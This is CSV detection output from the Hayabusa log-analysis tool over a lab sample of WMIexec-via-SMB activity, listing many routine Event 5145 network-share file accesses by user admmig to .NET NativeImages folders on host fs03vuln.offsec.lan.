2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\635558b506364815e8348217e86fdf99 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f#\b8d89e2f35d492e69789bd504270dff4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553#\2af2b08e949ae5ebe946684d477a50d5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73#\e75ae269d8eb8c8fb7bdcce4082ff8c2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8#\64d113caa8b81caec5c21797931b5624 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\10483ca149b5c651d217edbf2f3169b4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting\e9062794b3050c9564584baa07300c10 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\77bc1a994f64193efc124c297b93fdb7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7#\1e30da61ac8d97f7b17cdce57fb6a874 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\6f7a4225a199ad7894379512ca6ae50c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler\313baced763e9e5054e7694d5594cde5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Temp : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6#\a1f231be2afa2e51dfc0a1f76644d2f7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient\abccca8c6f96e1d3c686a69acb31b9a9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider\c926f90d88838d450951cd6c5b41c961 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes\3be4139a741b447ab35a2c788a2f4559 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484#\d081d0c6a64c64fa9afe4e545f2eaa05 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\9bbf715cfb5360c95acd27b199083854 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481#\f002202a6660cc8ce07f8ae19d6fac84 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig\30fd20e8b16392d487e0f52dfd8a5900 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask\72aa615c9ea48820d317a6bed7b07213 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask\b1861416b236727b9d51d4568d9f6841 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility\fabe62e146147faa9fc09e8b9a63d5cc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc#\9fe5c370593d72077c6ebc935bdccaf8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc\5965cfde76afc1f5c5d70d32fe0c7270 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy\9efa8cc0254efc497ae439914bbe9207 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx\8feba1d1646b72a4bc348315fa7bad6b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig\44570ea6e616aa8a35b0768a4336f69d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers\a5132d26ad1468bf7b6b89725e4cefce : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
